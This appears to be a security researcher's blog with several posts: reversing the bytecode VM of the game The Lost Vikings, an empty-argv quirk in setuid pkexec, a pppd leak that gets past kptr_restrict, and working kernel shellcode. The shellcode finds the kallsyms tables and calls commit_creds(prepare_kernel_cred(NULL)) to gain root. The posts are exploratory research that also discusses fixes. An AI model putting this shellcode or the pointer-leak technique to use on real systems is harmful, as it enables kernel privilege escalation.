Moving back to the top-level opcode 0x14 handler the next thing which is called is sub_15470. This is only three bytes before the first sub-function which was called. Again it is a clever code optimisation. This sub-function simply shifts ax right by 3 and then falls into the code we just reversed above. So the first byte operand of opcode 0x14 is used to encode how two further arguments are fetched. Reversing the handling of the second byte operand shows that it functions the same way.

After fetching all its (variable length) operands the handler for opcode 0x14 then calls sub_13809. I won’t paste the code here because the function is somewhat large, and calls a bunch of other sub-functions, all of which are also large. This is one of those instances where I just didn’t bother reversing what the function did because I was later able to guess it from context.

CISC Virtual Machine

The instructions in The Lost Vikings virtual machine are variable length. In the case of opcode 0x14, and other similar opcodes, determining the length requires decoding some of the operands. Having variable length instructions means that programs need to be iteratively disassembled, determining at least the number of operands for each new opcode in the program. If the opcodes where all fixed length it would be possible to skip opcodes that were unknown.

There are also instructions which perform common operations that many programs use. For example many programs add or subtract from the current position of the object based on its direction. This could be encoded as several instructions, but opcode 0x91 takes a single word operand as an offset in DS and then adds or subtracts the current temporary register value from it based on the current objects horizontal direction (flag 0x0040). The following pseudo code illustrates the operation of opcode 0x90.

if (this.flags & 0x0040)
    DS[operand] -= var;
else
    DS[operand] += var;

This results in far fewer bytes in the encoding, especially since this operation is performed by several of the programs. Back in the DOS days when disk space and computation time where at a premium this makes perfect sense. For the modern day reverser it simply adds a bunch more opcodes that need to be understood.

Disassembly Tool

I wrote a simple Python script which can disassemble the virtual machine programs into something that looks vaguely like C. It works by linearly decoding instructions in the program, storing jump and call addresses. When it hits a function which terminates or redirects code-flow, such as a return or unconditional jump, it stops and checks to see if there are any unvisited addresses in the program.

The developers have used similar optimisation tricks in the virtual machine programs to the ones used in game binary. For example, some exit paths of subroutines in the virtual machine programs are reused by jumping to them from other subroutines. The disassembler works around this by decoding the instructions twice, so two subroutines may have code with the same addresses.

The disassembler is able to squash accesses to the temporary register to make the resulting code more readable. For example the virtual machine programs often contain sequences like:

var = 0x1000;
obj->field_10 = var;

Which the disassembler will refactor to:

obj->field_10 = 0x1000;

The disassembler does not attempt to refactor code blocks into constructs like if or while blocks, so the resulting programs are spaghetti code. Some of the larger programs become a reversing project in their own right.

A complete program

I started with the program for the gun turret in the top-left of the first (object class 0x04). It seemed like it should be a fairly simple program. The gun turret shoots bullets at a fixed interval, and it cannot be destroyed by the vikings. The following shows the output of my dissassembler. Above each opcode is a comment showing the address in square brackets, the opcode in parens and then the operands.

The turret program looks like this:

main_374d:
{
    // [374d] (19) 37bc
    this.field_21 = 0x37bc;
    this.field_22 = 0x0001;

    // [3750] (97) 00 01
    if (0x0001 & (1 << 0))
        var = 0x0001;

    // [3753] (00)
    this.save_state();

    // [3754] (9c) 18 08
    if (!(var))
        this.db_flags &= ~(1 << 12);

label_3757:
    // [3757] (2f)
    vm_func_2f();

    // [3758] (00)
    this.save_state();

    // [3759] (01)
    nop();

    // [375a] (51) 0000
    // [375d] (8c) 30 3798
    if (this.field_30 != 0x0000)
        call sub_3798;

    // [3761] (52) 1c
    // [3763] (77) 0000 3757
    if (this.update_time != 0x0000)
        jump label_3757;

    // [3768] (19) 37c8
    this.field_21 = 0x37c8;
    this.field_22 = 0x0001;

    // [376b] (52) 1e
    // [376d] (57) 0206
    g_tmp_a = this.xoff;

    // [3770] (51) 0004
    // [3773] (91) 0206
    if (this.flags & 0x0040)
        g_tmp_a -= 0x0004;
    else
        g_tmp_a += 0x0004;

    // [3776] (52) 20
    // [3778] (57) 0208
    g_tmp_b = this.yoff;

    // [377b] (51) fff8
    // [377e] (5a) 0208
    g_tmp_b += 0xfff8;

    // [3781] (51) 001e
    // [3784] (56) 1c
    this.update_time = 0x001e;

    // [3786] (02) 3030
    vm_func_02(0x3030);

    // [3789] (14) 12 0206 0208 00 0000 0000 05
    new.x = g_tmp_a;
    new.y = g_tmp_b;
    new.unknown_a = 0x0000;
    new.unknown_b = 0x0000;
    new.unknown_c &= 0x801;
    new.type = 0x05;
    spawn_obj(new);

    // [3795] (03) 3757
    jump label_3757;

}

sub_3798:
{
    // [3798] (51) 000a
    // [379b] (73) 30 37a5
    if (this.field_30 == 0x000a)
        jump label_37a5;

    // [379f] (51) 0000
    // [37a2] (56) 30
    this.field_30 = 0x0000;

    // [37a4] (06)
    return;

label_37a5:
    // [37a5] (52) 32
    // [37a7] (69) 0a 37ba
    if (this.argument < this.field_32)
        jump label_37ba;

    // [37ab] (52) 32
    // [37ad] (5c) 0a
    this.argument -= this.field_32;

    // [37af] (51) 0000
    // [37b2] (56) 30
    this.field_30 = 0x0000;

    // [37b4] (51) 0000
    // [37b7] (56) 32
    this.field_32 = 0x0000;

    // [37b9] (06)
    return;

label_37ba:
    // [37ba] (0e)
    vm_func_0e();

    // [37bb] (10)
    this.update();
}

There are a few things to note here:

  • The this.save_state() function is opcode 0x00. It acts a yield allowing the program to save where it was and return to the game engine code.
  • My dissasembler names some of the object fields that I had worked out. In this program you can see the xoff, yoff, flags and update_time are named.
  • Similarly DS offsets that are known are also named. g_tmp_a and g_tmp_b are DS offsets 0x0206 and 0x0208.
  • Opcode 0x14 is used here. I’ve named it spawn_obj(), because from context it is used to spawn a new bullet object each time the turret fires.
  • Opcode 0x19 is assigning to object fields 0x21 and 0x22. Notably field 0x21 is being assigned a value that looks like a program address. From reading the code/experimentation this address is actually an offset for instructions in a smaller secondary virtual machine which controls how the objects graphics are displayed. I’ve not yet reversed this code.

Refactoring the program makes it easier to understand what is going on:

main_374d:
{
    /* Turret initialisation */
    this.set_graphics_prog(0x37bc);

    if (0x0001 & (1 << 0))
        var = 0x0001;

    this.save_state();

    if (!(var))
        this.db_flags &= ~(1 << 12);

label_3757:
    /*
     * Main loop for the turret. This yields to the main
     * game engine on each iteration.
     */
    while (1) {
        vm_func_2f();
        this.save_state();

        /*
         * The functionality of this is unknown. The this.argument
         * field can be set for an object instance in the level
         * header. It may be used to make some turrets behave
         * slightly differently.
         */
        if (this.field_30 != 0x0000) {
            if (this.field_30 != 0x000a) {
                this.field_30 = 0x0000;
            } else {
                if (this.argument < this.field_32) {
                     vm_func_0e();
                     this.update();
                } else {
                    this.argument -= this.field_32;
                    this.field_30 = 0x0000;
                    this.field_32 = 0x0000;
                }
            }
        }

        /* If the update time reaches zero then fire a bullet */
        if (this.update_time == 0x0000) {
            this.set_graphics_prog(0x37c8);
             
            /* Reset the update time */
            this.update_time = 0x001e;
        
            vm_func_02(0x3030);
                          
            /*
             * Spawn a bullet object 4 pixels in front of the
             * turret and 8 pixels above its center line.
             */
            if (this.flags & OBJ_FLAG_FLIP_HORIZONTAL)
                new.x -= 4;
            else
                new.x += 4;
            new->y = this.yoff - 8;
            new->unknown_a = 0x0000;
            new->unknown_b = 0x0000;
            new->unknown_c &= 0x801;
            new->type_d = 0x05;
            spawn_obj(new);
        }
    }
}

Note that there are still a few sections of the program and some opcodes that I have not identified the function of, but the behaviour of the turret can be easily seen. The update_time object field is used to encode the rate the turret fires at. The program itself does not (at least obviously) decrement this value. Possibly one of the unknown opcodes performs this operation, or some part of the main game engine may do it.

Game Hacking

Being able to view the original programs used by the game is interesting, but the cool part about having a virtual machine implementing the object behaviour is the possibility of modifying or creating new programs. This would be much easier if I were to write a compiler (todo list), but for now this requires poking values manually in a hex editor.

Again I chose to modify the gun turret program since it is quite simple. My first idea was to change the object type that the turret shoots. I had mixed success with this. Attempting to make it shoot some objects, like the green alien, will just result in the game crashing or freezing. Other object types just result in the turret shooting nothing. I was able to make it shoot fire arrows (these are normally a power-up that one of the vikings can use). It is also easy to make the turret shoot more quickly, by lowering the value of the update_time field.

The second modification I made a bit more ambitious: making the turret walk instead of shoot. The opcode (0x14) for spawning the bullet is quite long:

14 12 0206 0208 00 0000 0000 05

The virtual machine (quite generously) provides a single byte nop instruction (0x01), which can be used to remove this instruction. The instructions above have already set DS[0x0206] to the current x position of the turret plus or minus 4 based on its direction, so I just needed to add instructions to set the current x position to that value. This requires only two instructions:

53 0206   // var = DS[0x0206];
56 1e     // this.x = var;

With this change the turret will walk, but will not be obstructed by anything. I did attempt to make it do collision detection and turn around, but I couldn’t get it work properly. More reversing required.

I put together a small video showing the modifications:

I’ve also made my dissassembler tool available:

https://github.com/RyanMallon/TheLostVikingsTools/blob/master/dissassembler/lv_vm_disasm.py

argv silliness

Most C programmers should be aware that the argv argument to main() is a NULL terminated list of strings, where the first element is the name of the program. On Linux there is an odd “feature” which allows the list to be empty. From the Linux execve(2) manpage:

On Linux, argv can be specified as NULL, which has the same effect as specifying this argument as a pointer to a list containing a single NULL pointer. Do not take advantage of this misfeature! It is non standard and non portable: on most other UNIX systems doing this will result in an error (EFAULT).

This allows us to execute an application with argv[0] == NULL. Many applications, including several setuid applications, make the assumption that argv[0] is always a valid pointer. While I haven’t found any potential exploits using this, it does allow for some amusing behaviour from setuid binaries.

First we want to set up an easy to use environment for calling execve and trapping the executed process in a debugger. Python’s os library will let us call execve() with an empty argv list. First we want to start a Python interpreter and get its pid so that we can attach a debugger to it:

$ python
>>> import os
>>> os.getpid()
18452

On Linux gdb is able to catch fork and exec events and attach the the debugger to the forked or execed process. There is a full description of these features here. For this example, we just need to catch the exec event and attach to the new process. The default settings for gdb will stop execution at the beginning of the exec’ed process (note you will need to run gdb as root if you want to catch an exec of a setuid binary):

$ gdb
(gdb) catch exec
(gdb) attach 18542
(gdb) c

The debugger is now attached to the Python shell. We now need to pick a target binary to execute. Unfortunately many setuid binaries do the following somewhere early on in main():

progname = basename(argv[0]);

With the POSIX version of basename() this would be okay, since the standard says that passing a NULL pointer will return the string “.”. The basename() function has some historical clunkiness. Because it returns a string, rather than using a user supplied buffer and length, implementations may modify the path name argument in place. The GNU C library attempted to fix this by providing their own version, also called basename() to avoid confusion. One difference, which the basename(3) manpage fails to mention, is that GNU basename() will segfault if passed a NULL pointer.

After searching around on a stock Ubuntu system for setuid binaries that looked promising for passing argv[0] == NULL to I found pkexec. pkexec is part of the Polkit package, and allows a binary to be executed as another user (similar to sudo). We call execve() passing a empty argv list and a single dummy environment varaible:

>>> os.execve("/usr/bin/pkexec", [], {"FOO":"aaaaaaaaa"})

The exec event is caught, and gdb will stop inside the pkexec binary in the function _start():

process 18452 is executing new program: /usr/bin/pkexec

Catchpoint 1 (exec'd /usr/bin/pkexec), 0x00007f634eafc6b0 in _start ()
   from /lib64/ld-linux-x86-64.so.2
(gdb) where
#0  0x00007f634eafc6b0 in _start () from /lib64/ld-linux-x86-64.so.2
#1  0x0000000000000000 in ?? ()

There is a bunch of stuff that happens before main() is called. We want to break on the function __libc_start_main(), which is what calls main():

(gdb) b __libc_start_main
(gdb) c
Continuing.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 3, __libc_start_main (main=0x402010, argc=0, 
    ubp_av=0x7fff44607b98, init=0x403660, fini=0x4036f0, 
    rtld_fini=0x7f7a3ad43740 <_dl_fini>, stack_end=0x7fff44607b88)
    at libc-start.c:96

When a process is executed, the arguments and the environment are passed as a continuous chunk of memory separated by a NULL pointer in the ubp_av argument. The __libc_start_main() function separates them out as follows (simplifed):

#define argv ubp_av
char **evp = &ubp_av[argc + 1];

In gdb we can see that the environment is immediately after argv, which contains only a single NULL pointer:

(gdb) p *ubp_av
$1 = 0x0
(gdb) p *(ubp_av + 1)
$2 = 0x7fff44607fda "FOO=aaaaaaaaa"

Looking at the main() function for pkexec we see that it parses its command line arguments as follows (simplified):

for (n = 1; n < (guint) argc; n++)
  {
    ...
  }

  ...
 
path = g_strdup (argv[n]);
if (path == NULL)
  {
    usage (argc, argv);
    goto out;
  }

We never enter the body of the for loop because argc == 0. At the end of the loop n == 1, which means that g_strdup() is going to copy from the environment rather than argv, resulting in this:

Cannot run program FOO=aaaaaaaaa: No such file or directory

By creating an executable in the local directory called “FOO=aaaaaaaaa” we can get pkexec all the way to actually trying to run it. However, because we can’t pass any option arguments, the executing user will default to root, which presumably we don’t have the password for. Although getting a setuid binary to use envp in place of argv is amusing, a quick skim of the pkexec source doesn’t show anything that is likely to be vulnerable to having argv[0] be NULL. For a binary to be vulnerable would probably require some reasonably unorthodox code. That said, a number of binaries, notably the sudo suite, do protect against the case where argc == 0.

kptr_restrict – privilege checks

In the Linux kernel kptr_restrict is used to protect sensitive kernel pointer values by printing them as zeros if a kernel provided file (e.g. /sys, /proc, etc) is read as a non-privileged user. This is implemented with a printf extension called “%pK”. Typically code prints to a /sys or /proc file using the seq_file interface. For example:

seq_printf(m, "secret pointer = %pK\n", secret_pointer);

When kptr_restrict is enabled and a file using this interface is read a check is done to see if the user has CAP_SYSLOG. If so, the real pointer value is printed, otherwise zeros are printed.

This deviates from the normal UNIX file privilege model, where file permissions are checked at open time, not read time. This becomes a problem when a setuid binary reads a file which uses %pK to protect sensitive pointers. Setuid binaries which need to open files will typically drop privileges to open the file. This ensures that only files which the real user has access to will be opened. Once the file is opened, the setuid binary can re-elevate its privileges.

Consider the code in pppd for parsing the options file in pppd/options.c:options_from_file():

euid = geteuid();
if (check_prot && seteuid(getuid()) == -1) {
    option_error("unable to drop privileges to open %s: %m", filename);
    return 0;
}
f = fopen(filename, "r");
err = errno;
if (check_prot && seteuid(euid) == -1)
    fatal("unable to regain privileges");

The effective user id is set to the real user id and then the options file is opened. Only a file readable by the real user can be opened here. Once the file has been successfully opened, the pppd binary immediately re-elevates privileges. Looking a few lines down in the code we see this:

while (getword(f, cmd, &newline, filename)) {
    opt = find_option(cmd);
    if (opt == NULL) {
        option_error("In file %s: unrecognized option '%s'",
                     filename, cmd);
        goto err;
    }
    ...

The pppd option parser reads commands, and will print out an error if the command is not valid.

The problem is that %pK checks privileges when the file is read, not when it is opened. Most files which use %pK are world readable, so they will pass the open check in pppd. But when the read is done pppd is running as root and so the %pK protection will not be in effect. Which means we can do this:

$ head -1 /proc/kallsyms 
00000000 T startup_32 
$ pppd file /proc/kallsyms
pppd: In file /proc/kallsyms: unrecognized option 'c1000000'

Unfortunately pppd bails on the first error in the file, so we can’t get it to dump the full contents of /proc/kallsyms. It is useful for one-liner %pK files such as those in /sys/module//sections/* though. Most setuid applications avoid printing anything from opened files, pppd being the only one I could find in a stock Ubuntu 12.04 installation. If you get lucky though, you might find a less paranoid setuid binary which will happily write out the full contents of a file under the assumption that the real user must be able to read it anyway.

The quick and dirty fix to this issue is to check that, in addition to having CAP_SYSLOG, the real and effective uids and gids are equal before printing the real %pK values. That fix has been merged into mainline Linux here.

The better long term fix is to do the privilege check at open time and store it as part of the seq_file structure. Rather than using a %pK, a function should be used which checks the stored privilege. For example:

seq_printf(m, "secret pointer = %p\n", 
           seq_secret_pointer(m, secret_pointer));

The seq_secret_pointer function should return NULL if the user which issued the open does not have CAP_SYSLOG. Unfortunately, fixing this is not entirely straight forward. Most users of %pK are using the seq_file interface, and can be easily converted. There are a handful of %pK uses in printk statements, which are basically just incorrect since no sane permission check can be done (nobody opens printk). There is already a protection mechanism for printk, called dmesg_restrict, so the printk uses can simply be changed to %p. The only problem is the module sections files (see above), which use the traditional style sysfs show function rather than a seq_file (see kernel/module.c: module_sect_show()). Some thought needs to go into how to refactor that code in order to store the open time privileges.

kptr_restrict – Finding kernel symbols for shell code

A common approach to getting a root shell from an exploit which grants execution in the kernel is to jump to a user controlled function which does the following:

commit_creds(prepare_kernel_cred(NULL));

These kernel functions will create a new credit structure with root privileges, and then commit that credit structure to the current process. After returning to user-space, a root shell can be spawned.

Before doing all this, the attacker needs to know the addresses of the kernel functions. Helpfully, the Linux kernel provides a user readable file called /proc/kallsyms, which lists the addresses of all the exported symbols in the kernel. An unprivileged attacker can use this file to get the addresses of necessary kernel functions for the shell code. For example:

$ grep prepare_kernel_cred /proc/kallsyms | head -1
84056fec T prepare_kernel_cred

Being able to do this as an unprivileged user has more recently (at least by the mainline kernel) been viewed as undesirable, because it provides internal kernel information to attackers. As such, there was discussion around making /proc/kallsyms unreadable, which eventually resulted in a feature called kptr_restrict being added to the kernel.

kptr_restrict is a sysctl which makes pointer values printed with “%pK” appear as zero, unless you have CAP_SYSLOG. With it enabled, we get the following instead:

$ grep prepare_kernel_cred /proc/kallsyms | head -1
00000000 T prepare_kernel_cred

Which is much less useful to a would-be attacker. In the initial discussion about hiding /proc/kallsyms, a few people pointed out that most installations are distro kernels, and attackers can simply hard-code the addresses for the necessary functions. Indeed, this is what a number of PoC exploits now do, sometimes with a small table for targeting a few different kernels. This works, but significantly reduces the number of machines that the exploit will work against.

I wanted to try and find a generic, portable method for finding the kernel symbols even with kptr_restrict enabled. For this example, I am assuming that an attacker has already gained kernel mode code execution, and needs a reliable way to find the addresses of the necessary kernel functions for creating the shell code. Note that once you have code execution, you have really already won, and kptr_restrict, and many other protections will cease to be fully effective. kptr_restrict is still effective against other forms of attacks, such as arbitrary writes. The method I’m presenting here is just one possible way to get the the kallsyms addresses once executing in kernel mode.

I started by looking at what information can be gathered about the kallsyms. Although kptr_restrict hides the most useful information, the symbol addresses, an unprivileged user can still read the file and collect some information about the symbols, including:

  • The names of the symbols
  • The number of symbols
  • The order that they appear in the kernel’s kallsyms table

The first thing to note is that the kallsyms table is large. There are around seventy-thousand built-in symbols on my desktop machine. Since we know the order and names of the symbols, we can probably search for a matching table in the kernel’s memory. The sheer size and uniqueness of the table makes it certain that a match will be what we are looking for. So lets look at how the kernel stores the table. From kernel/kallsyms.c:

extern const unsigned long kallsyms_addresses[] __attribute__((weak));
extern const u8 kallsyms_names[] __attribute__((weak));

The __attribute__((weak)) part is a gcc directive which marks the symbols as weak, meaning that any other definition of these symbols will supersede these ones. This doesn’t matter for our purposes, since either way, the arrays will be in the data section. Looking through the code in kernel/kallsyms.c we can see that kallsyms_addresses is an ordinary array, but kallsyms_name is a compressed string table. We also note that the arrays in kernel/kallsyms.c only stores the built-in symbols; module symbols are stored elsewhere.

Before attempting to match the kallsyms name table, we first need to create a compressed version. Fortunately there is some code already provided for this in scripts/kallsyms.c. Usually scripts/kallsyms runs during the Linux kernel build and takes the System.map file as an input and generates an assembler file as its output. Looking at the System.map file we see that it has the same format as /proc/kallsyms, so we can reuse scripts/kallsyms.c with only a few small modifications:

  • We don’t want to sort the symbols in the input file, since /proc/kallsyms is already sorted.
  • We want to skip module symbols from /proc/kallsyms. These can be identified by having “[module_name]” at the end of the string.
  • We want to create an in memory copy of the name table, rather than writing it to a file.

By doing that we can create an exact copy of the kallsyms_names array in user-space. The next step is to find it once we are executing in kernel mode. The kallsyms_names array is in the data section, which is at the base of the kernel’s memory. Before searching for it, we need to find out where the kernel actual resides, since its location depends on the architecture and the VM split. We can determine the address of the kernel by attempting to mmap addresses where the kernel might be, starting with low addresses and working our way up. If an mmap call fails, then chances are that the kernel resides there:

static unsigned long *kernel_base;

static void find_kernel_base(void)
{
        unsigned long addrs[] = {
                0x80000000,
                0xc0000000,
#ifdef X64
                0xffffffff81000000,
#endif
        };
        void *map;
        int i;

        for (i = 0; i <; ARRAY_SIZE(addrs); i++) {
                map = mmap((void *)addrs[i], 0x1000, PROT_NONE,
                           MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
                if (map == MAP_FAILED) {
                        kernel_base = (unsigned long *)addrs[i];
                        printf("Guess kernel base @ %p\n", kernel_base);
                        return;
                }
                munmap((void *)addrs[i], 0x1000);
        }

        printf("Can't guess kernel base\n");
        exit(EXIT_FAILURE);
}

The kallsyms_names array resides in the kernel’s data section, which is at the base of its memory. We don’t know the exact location, but that doesn’t matter because the kernel’s low memory is always contiguously mapped. We should be able to scan about 16MB from the kernel’s base on most architectures without problem.

When trying to match the table, we first do a partial match to speed things up. Here is the first part of our shell code which runs in kernel space:

#define KERNEL_LOWMEM_SIZE (16 * 1024 * 1024)
#define PARTIAL_MATCH_SIZE 64

static unsigned long *kallsyms_find_name_table(void)
{
        unsigned long *addr;
        int count;

        for (addr = kernel_base; 
             addr + kallsyms_names_size < kernel_base + KERNEL_LOWMEM_SIZE; 	     
             addr++) { 		
                if (memcmp(addr, kallsyms_names, PARTIAL_MATCH_SIZE) != 0)
                        continue;
                if (memcmp(addr, kallsyms_names, kallsyms_names_size) != 0)
                        continue;
                return addr;
        }

        /* Couldn't find it */
        return NULL;
} 

We now know the location of the kallsyms_names array in the kernel (and have verified that our view of it from user-space is consistent with the kernel’s view). From here we need to find the kallsyms_addresses table. In the kernel/kallsyms.c code the kallsyms_addresses array is declared immediately before the kallsyms_names array, so it should be just before it in the data section. Note that while the compiler could re-arrange these arrays, there is probably little reason for it to do so. It does however, re-align the kallsyms_addresses array (probably for cache performance), and may move some other variables between the two arrays (notably kallsyms_num_syms). We know how many symbols there are (stored in the table_cnt variable in the scripts/kallsyms.c code), that the symbols are in order, and that all of the symbol addresses will be in the low part of the kernels memory. This allows to scan backwards from the beginning of the kallsyms_name table to find the kallsyms_addresses table. We first subtract the table_cnt from the kallsyms_names location, and then continue going backwards while we have a valid looking kernel pointer, which is less than or equal to the one above it:

 
static bool is_kernel_pointer(unsigned long value) {
        return
#ifdef X64
                /*
                 * Ubuntu 64-bit lists a bunch of data items with low
                 * addresses in /proc/kallsyms.
                 */
                (value >= 0x0 && value <= 0x20000) ||
#endif
                (value >= (unsigned long)kernel_base &&
                 value <= (unsigned long)kernel_base + KERNEL_LOWMEM_SIZE);
}

static unsigned long *kallsyms_find_addr_table(unsigned long *names_base)
{
        unsigned long *addr, prev_ptr = ~0;

        for (addr = names_base - table_cnt; addr >= kernel_base; addr--) {
                if (!is_kernel_pointer(*addr) || *addr > prev_ptr)
                        break;

                prev_ptr = *addr;
        }

        if (addr == kernel_base) {
                /* Whoops */
                return NULL;
        }

        addr++;
        return addr;
}

We now have the location of the kallsyms_addresses array. The next step is for our shell code to get the addresses of the functions it needs. The easiest way to do this is to prepare the array indexes of the functions before we enter kernel-space. We can get these from /proc/kallsyms, allowing our shell code to then do:

prepare_kernel_cred = (void *)ksyms[idx_prepare_kernel_cred];
commit_creds = (void *)ksyms[idx_commit_creds];

commit_creds(prepare_kernel_cred(NULL));

Return to user-space, spawn a shell and now we are root. I’ve tested this approach using the same code on 64 and 32bit versions of Ubuntu 12.04, and on Linux 3.7 running on an ARM Realview PB-A8. In each case the shell code is able to find the kallsyms_addresses array and subsequently get root.

There are also some other interesting approaches to finding the kernel symbol names. Spender’s enlightenment framework looks for a unique string in the kernel/kallsyms.c text, and then uses that as a starting point for finding the function kallsyms_lookup_name(), which the shell code can then use to find any the address of symbol while running in kernel space. Another approach is to scan kernel memory for the “%pK %c %s” string that is used to print /proc/kallsyms and replace the “K” with a space, disabling the kptr_restrict protection for the string.